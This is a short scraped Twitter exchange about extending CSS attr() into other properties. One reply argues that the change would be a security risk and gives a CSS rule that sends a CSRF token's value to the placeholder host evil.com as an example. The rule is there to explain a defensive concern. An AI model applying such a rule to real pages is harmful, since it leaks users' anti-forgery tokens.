Should most be able to use attr() in more #CSS values, like "background-image: attr(data-src);" or something or other.
@jvhellemond That’s a security risk.
#csrf-token {
background: url('//evil.com/?x=' attr(value));
}
Cfr. https://vimeo.com/100264064
-
-
@mathias Ah, so bad example. Guess I should start paying attention to talks at conferences. Esp. the ones we, well eh... "sponsor" ;)Thanks. Twitter will use this to make your timeline better. UndoUndo
-
Loading seems to be taking a while.
Twitter may be over capacity or experiencing a momentary hiccup. Try again or visit Twitter Status for more information.
JavaScript, HTML, CSS, HTTP, performance, security, Bash, Unicode, i18n, macOS.